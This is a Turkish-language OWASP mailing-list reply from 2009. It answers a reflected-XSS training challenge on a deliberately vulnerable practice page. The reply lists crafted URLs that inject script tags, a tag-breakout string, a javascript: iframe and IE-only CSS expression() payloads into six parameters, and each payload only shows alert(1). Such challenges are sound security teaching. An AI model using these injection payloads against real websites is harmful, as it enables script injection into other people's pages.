1) <a href="http://www.webguvenligi.org/xsstb/reflected.php?vector1=">http://www.webguvenligi.org/xsstb/reflected.php?vector1=</a>&lt;script&gt;alert(1)&lt;%2Fscript&gt;<div><br>2) <a href="http://www.webguvenligi.org/xsstb/reflected.php?vector1=&amp;vector2=">http://www.webguvenligi.org/xsstb/reflected.php?vector1=&amp;vector2=</a>&lt;div&quot;&quot;&gt;&lt;script&gt;alert(1)&lt;%2Fscript&gt;</div>
<div><br>3) sadece IE7, IE6 da xss:expression(alert(1)) yazınca çalışıyor</div><div><a href="http://www.webguvenligi.org/xsstb/reflected.php?vector1=&amp;vector2=&amp;vector3=xss%3Aexpression(alert(1))&amp;vector4=&amp;vector5=&amp;vector6=&amp;vector7=">http://www.webguvenligi.org/xsstb/reflected.php?vector1=&amp;vector2=&amp;vector3=xss%3Aexpression(alert(1))&amp;vector4=&amp;vector5=&amp;vector6=&amp;vector7=</a></div>
<div><br></div><div>4) <a href="http://www.webguvenligi.org/xsstb/reflected.php?vector1=&amp;vector2=&amp;vector3=&amp;vector4=--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(1)%3C%2FSCRIPT%3E&amp;vector5=&amp;vector6=&amp;vector7=">http://www.webguvenligi.org/xsstb/reflected.php?vector1=&amp;vector2=&amp;vector3=&amp;vector4=--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(1)%3C%2FSCRIPT%3E&amp;vector5=&amp;vector6=&amp;vector7=</a></div>
<div><br></div><div>5) <a href="http://www.webguvenligi.org/xsstb/reflected.php?vector1=&amp;vector2=&amp;vector3=&amp;vector4=&amp;vector5=%3Ciframe+src%3Djavascript%3Aalert(1)%3E%3C%2Fiframe%3E&amp;vector6=&amp;vector7=">http://www.webguvenligi.org/xsstb/reflected.php?vector1=&amp;vector2=&amp;vector3=&amp;vector4=&amp;vector5=%3Ciframe+src%3Djavascript%3Aalert(1)%3E%3C%2Fiframe%3E&amp;vector6=&amp;vector7=</a></div>
<div><br></div><div>6) Muhakkak basit bir yolu vardır ama ben bulamadım :))<br><br>7) #444;background-image: expression(alert(1)); yine IE7,IE6 da çalışıyor</div><div><a href="http://www.webguvenligi.org/xsstb/reflected.php?vector1=&amp;vector2=&amp;vector3=&amp;vector4=&amp;vector5=&amp;vector6=&amp;vector7=%23444%3Bbackground-image%3A+expression(alert(1))">http://www.webguvenligi.org/xsstb/reflected.php?vector1=&amp;vector2=&amp;vector3=&amp;vector4=&amp;vector5=&amp;vector6=&amp;vector7=%23444%3Bbackground-image%3A+expression(alert(1))</a></div>
<div><br></div><div>7&#39;de 7 Yapmak gerekiyormu ? :P<br><br><div class="gmail_quote">2009/6/15 Bedirhan Urgun <span dir="ltr">&lt;<a href="mailto:bedirhanurgun@gmail.com">bedirhanurgun@gmail.com</a>&gt;</span><br><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex;">
<div>Merhaba,</div>
<div>Farklı Reflected XSS tekniklerini öğrenip uygulayabileceğiniz bir &quot;oyun grubu&quot; uygulamasına <a href="http://www.webguvenligi.org/xsstb/reflected.php" target="_blank">http://www.webguvenligi.org/xsstb/reflected.php</a> erişebilirsiniz.</div>


<div>Uygulamada 7 parametreye (vector1, vector2, ..., vector7) uygulanabilecek xss saldiri vektorleri var. Bu vektorleri exploit ederek, bu maile reply-all olarak asagida verdigim link gibi gonderen ilk iki kisye;</div>
<div> </div>
<div>1inciye Maldivler&#39;e 2 kisilik 7 gun 7 gece seyehat</div>
<div>2inciye Son model araba   </div>
<div> </div>
<div>Yok daha neler!... </div>
<div> </div>
<div>1inciye OWASP Membership T-Shirt&#39;u (L)</div>
<div>2inciye OWASP Membership DVD&#39;si</div>
<div> </div>
<div>gonderecegim.</div>
<div> </div>
<div>Ornek; (birinci tuyo benden)</div>
<div><a href="http://www.webguvenligi.org/xsstb/reflected.php?vector1=%3Cscript%3Ealert(1)%3C/script%3E" target="_blank">http://www.webguvenligi.org/xsstb/reflected.php?vector1=%3Cscript%3Ealert(1)%3C/script%3E</a></div>

<div> </div>
<div> </div>
<div>Not 1: ekrana alert kutucugu icionde 1 yazdirmak yeterli</div>
<div>Not 2: onemli olan owasp-tr mail arsivlerine dusme sirasi</div>
<div>Not 3: en son yazdigim hediyeler gecerli! sonra &quot;vay ben gormedim&quot; olmasin</div>
<div> </div>
<div>Proje Post&#39;u: <a href="http://www.webguvenligi.org/projeler/reflected-xss-oyun-grubu.html" target="_blank">http://www.webguvenligi.org/projeler/reflected-xss-oyun-grubu.html</a></div>
<div></div>-- <br><font color="#888888">Bedirhan Urgun<br><a href="http://www.webguvenligi.org" target="_blank">http://www.webguvenligi.org</a><br><a href="http://www.owasp.org/index.php/Turkey" target="_blank">http://www.owasp.org/index.php/Turkey</a><br>
<br>Türkçe Web Uygulama Güvenliği E-Posta Listesine üye olmak için: <br>
<a href="https://lists.owasp.org/mailman/listinfo/owasp-turkey" target="_blank">https://lists.owasp.org/mailman/listinfo/owasp-turkey</a><br>
</font><br>_______________________________________________<br>
Owasp-turkey mailing list<br>
<a href="mailto:Owasp-turkey@lists.owasp.org">Owasp-turkey@lists.owasp.org</a><br>
<a href="https://lists.owasp.org/mailman/listinfo/owasp-turkey" target="_blank">https://lists.owasp.org/mailman/listinfo/owasp-turkey</a><br>
<br></blockquote></div><br><br clear="all"><br>-- <br>Çağdaş Emek<br>Software Engineer<br><a href="http://www.linkedin.com/in/keramet">http://www.linkedin.com/in/keramet</a> <br>
</div>